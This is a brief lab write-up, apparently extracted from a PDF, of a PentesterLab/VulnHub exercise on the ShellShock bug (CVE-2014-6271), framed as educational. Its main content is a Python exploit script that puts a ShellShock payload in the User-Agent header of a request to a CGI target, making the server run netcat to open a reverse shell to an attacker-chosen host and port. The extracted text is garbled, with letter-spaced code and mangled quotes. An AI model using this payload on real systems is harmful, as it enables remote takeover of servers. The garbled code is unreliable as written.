CVE-2014-6271 ShellShock A short pentest from @PentesterLab Toufik Airane www.tfairane.com [email protected] LATEX October 26, 2014 Contents 1 Preface 1.1 disclaimer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.2 whoami . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 2 2 2 Ok, at 3 ! 3 ... (running) 2 3 Get lucky 3 1 1 1.1 Preface disclaimer This paper is living only for educational purpose. 1.2 whoami I’m a French student studying computer science. Snoop at his lost time, ... 2 Ok, at 3 ! 3 ... (running) An exercice release by @PentesterLab about the recent buzz namely CVE-2014-6271 ’ShellShock’. @VulnHub : http://vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/ Figure 1: @PentesterLab you like fruits ? Figure 2: man cve-2014-6271 2 Figure 3: CGI exploitation 3 Get lucky #!/ b i n / python import r e q u e s t s import j s o n import s y s t a r g e t = s t r ( s y s . argv [ 1 ] ) a t t a c k = s t r ( s y s . argv [ 2 ] ) p o r t = s t r ( s y s . argv [ 3 ] ) p r i n t ”CVE−2014−6271 S h e l l S h o c k CGI−BIN User−Agent ” p r i n t ” payload # ( ) { : ; } ; / b i n / bash −c ’ nc a t t a c k p o r t −e / b i n / sh ’ ” payload = ” ( ) { : ; } ; / b i n / bash −c ’ nc ”+a t t a c k+” ”+p o r t+” −e / b i n / sh ’ ” h e a d e r s = { ’ User−agent ’ : payload } r = r e q u e s t s . g e t ( t a r g e t , h e a d e r s=h e a d e r s ) print r . text So ! Pouf ! root ! Thank you. 3
© Copyright 2024 ExpyDoc
